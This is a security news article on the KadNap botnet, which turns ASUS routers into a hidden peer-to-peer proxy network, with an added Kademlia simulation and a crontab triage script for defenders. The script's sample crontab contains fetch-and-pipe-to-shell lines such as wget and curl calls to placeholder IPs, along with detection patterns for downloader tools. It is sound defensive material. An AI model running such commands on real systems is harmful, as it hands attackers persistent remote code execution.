StratosAlly – Cybersecurity for digital safety

KadNap Malware Turns 14,000 Routers Into a Hidden Proxy Network

StratosAlly

Cybersecurity researchers have identified a new malware strain, KadNap, that primarily targets ASUS routers and enlists them in a botnet used to relay malicious internet traffic.

According to Black Lotus Labs, the activity was first observed in August 2025, and more than 14,000 devices have since been infected. Over 60% of the affected devices are located in the United States, with smaller numbers identified in Taiwan, Hong Kong, Russia, the United Kingdom, Australia, Brazil, France, Italy, and Spain.

KadNap takes a different approach compared to many other botnets. Rather than relying on one central command server, it links infected devices together in a peer-to-peer network. Using a modified Kademlia DHT protocol, the malware can hide the attacker’s infrastructure and make the activity more difficult for security teams to detect.

Through this setup, infected routers can communicate directly with other compromised devices. They can locate peers, exchange information, and receive instructions without relying on one central server. This decentralized approach makes the botnet more resilient and difficult to shut down.
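As an added illustration, not KadNap's code and not its modified protocol, the following simulates the standard Kademlia lookup that the description above rests on: each peer keeps contacts in k-buckets indexed by the highest bit of the XOR distance, and a lookup repeatedly asks the closest known peers for closer ones, so any node can be located without a central server. The bucket width K=4, the 64-node overlay and the peer labels are assumptions for the demo; the page does not publish the malware's real parameters.

```python
import hashlib

K = 4  # contacts kept per k-bucket; assumed small for the demo (the Kademlia paper uses 20)


def node_id(label: str) -> int:
    """160-bit node ID derived from a label. Labels here are constructed."""
    return int.from_bytes(hashlib.sha1(label.encode()).digest(), "big")


def xor_distance(a: int, b: int) -> int:
    """Kademlia's distance metric: bitwise XOR of the two IDs."""
    return a ^ b


def bucket_index(own: int, other: int) -> int:
    """Which k-bucket `other` belongs to from `own`'s point of view:
    the highest differing bit, so bucket i holds peers at distance
    in [2**i, 2**(i+1))."""
    return xor_distance(own, other).bit_length() - 1


def closest(ids, target: int, k: int = K) -> list:
    """The k IDs from `ids` nearest to `target` by XOR distance."""
    return sorted(ids, key=lambda i: xor_distance(i, target))[:k]


class Peer:
    def __init__(self, label: str):
        self.id = node_id(label)
        self.buckets = {}  # bucket index -> up to K contact IDs

    def learn(self, other: int) -> None:
        """Add a contact to the right k-bucket if there is room."""
        if other == self.id:
            return
        bucket = self.buckets.setdefault(bucket_index(self.id, other), [])
        if other not in bucket and len(bucket) < K:
            bucket.append(other)

    def find_node(self, target: int, k: int = K) -> list:
        """Simulated FIND_NODE RPC: the k closest contacts this peer knows."""
        contacts = [c for bucket in self.buckets.values() for c in bucket]
        return closest(contacts, target, k)


def build_network(n: int) -> dict:
    """Constructed overlay of n peers with every k-bucket already populated,
    i.e. a converged routing state rather than the bootstrap process."""
    peers = [Peer(f"peer-{i}") for i in range(n)]
    for p in peers:
        for other in peers:
            p.learn(other.id)
    return {p.id: p for p in peers}


def iterative_lookup(peers: dict, start: int, target: int, k: int = K):
    """Kademlia iterative lookup from `start`: keep asking the closest
    not-yet-queried candidates for their closest contacts until the k best
    candidates have all been queried. Returns (k closest IDs, peers queried).
    In this populated network every queried peer at distance d knows a
    contact at distance < d (its bucket for that bit is non-empty), so the
    lookup converges on the target in O(log n) queries."""
    shortlist = {start} | set(peers[start].find_node(target, k))
    queried = set()
    while True:
        pending = [c for c in closest(shortlist, target, k) if c not in queried]
        if not pending:
            return closest(shortlist, target, k), len(queried)
        for c in pending:
            queried.add(c)
            shortlist.update(peers[c].find_node(target, k))


if __name__ == "__main__":
    net = build_network(64)
    start, target = node_id("peer-0"), node_id("peer-41")
    found, queried = iterative_lookup(net, start, target)
    print(f"target found: {found[0] == target}, peers queried: {queried} of {len(net)}")
```

The point for defenders is in the last function: there is no single address to block, because every peer is also a directory. Taking down a handful of nodes only removes a few bucket entries, and the remaining peers route around them.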

Researchers found that the infected routers are being used by a proxy service called Doppelgänger, which claims to offer residential proxies across more than 50 countries. The service is believed to be a rebranded version of Faceless, another proxy network previously linked to TheMoon malware. Through these services, cybercriminals can route traffic through real household IP addresses to hide the true origin of their activity.

The infection process begins with a shell script called “aic.sh” that is downloaded from a command-and-control server. This script creates a scheduled task that repeatedly reconnects to the server and downloads additional malicious files. One of these files installs the KadNap malware itself, which can run on routers using ARM or MIPS processors.

KadNap also connects to a Network Time Protocol (NTP) server to collect timing and system data, which it uses to generate a hash that seeds discovery of other peers in the decentralized network. Additional scripts can close port 22 (SSH) and load lists of command servers used by the botnet.
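An added defensive example, not from the article or the researchers: a small triage of crontab entries for the pattern described in the infection chain above, a scheduled task that repeatedly fetches and executes content from a remote server. The sample entries are constructed for the demo, with IP addresses from the TEST-NET documentation ranges; only the file name aic.sh comes from the article, and the heuristics below do not depend on it. The checks are generic (downloader in a cron command, output piped into a shell, binaries in world-writable directories, every-few-minutes schedules) and apply to BusyBox crond on routers as well as to ordinary Linux hosts.

```python
import re

# Constructed sample crontab (not indicators from the article). The IPs are
# from the TEST-NET documentation ranges; only the file name aic.sh is taken
# from the article, and it is incidental to the heuristics below.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * wget -q -O- http://198.51.100.23/aic.sh | sh
*/10 * * * * curl -s http://203.0.113.9:8080/update | /bin/sh
30 2 * * 0 /opt/scripts/backup.sh
* * * * * /tmp/.x/kad -p 2>/dev/null
"""

DOWNLOADER = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
PIPED_TO_SHELL = re.compile(r"\|\s*(/bin/)?(ba)?sh\b")
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def triage_cron_line(line: str) -> list:
    """Reasons a crontab line resembles a persistence stager; empty if benign."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    fields = line.split(None, 5)
    if len(fields) < 6:            # malformed entry or a VAR=value line
        return []
    minute, command = fields[0], fields[5]
    reasons = []
    if DOWNLOADER.search(command):
        reasons.append("fetches remote content")
    if PIPED_TO_SHELL.search(command):
        reasons.append("pipes the download straight into a shell")
    if any(d in command for d in WRITABLE_DIRS):
        reasons.append("runs a binary from a world-writable directory")
    if minute.startswith("*"):     # every minute or every few minutes
        reasons.append("high-frequency schedule (keeps reconnecting)")
    return reasons


def triage_crontab(text: str) -> dict:
    """Map each suspicious crontab line to its list of reasons."""
    report = {}
    for line in text.splitlines():
        reasons = triage_cron_line(line)
        if reasons:
            report[line] = reasons
    return report


if __name__ == "__main__":
    for entry, why in triage_crontab(SAMPLE_CRONTAB).items():
        print(f"{entry}\n    -> {', '.join(why)}")
```

On a router you would feed it the output of `crontab -l` or the contents of /var/spool/cron/crontabs; a hit on the "fetch and pipe into a shell" pair is the strongest signal, since legitimate firmware jobs almost never need to execute code that is re-downloaded every few minutes.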

Users are advised to:

  • Install the latest router firmware updates
  • Change default login credentials
  • Disable remote management features unless absolutely necessary
  • Replace devices that no longer receive security updates

While a compromised router might continue working normally, it could still be quietly helping power a cybercrime infrastructure in the background.
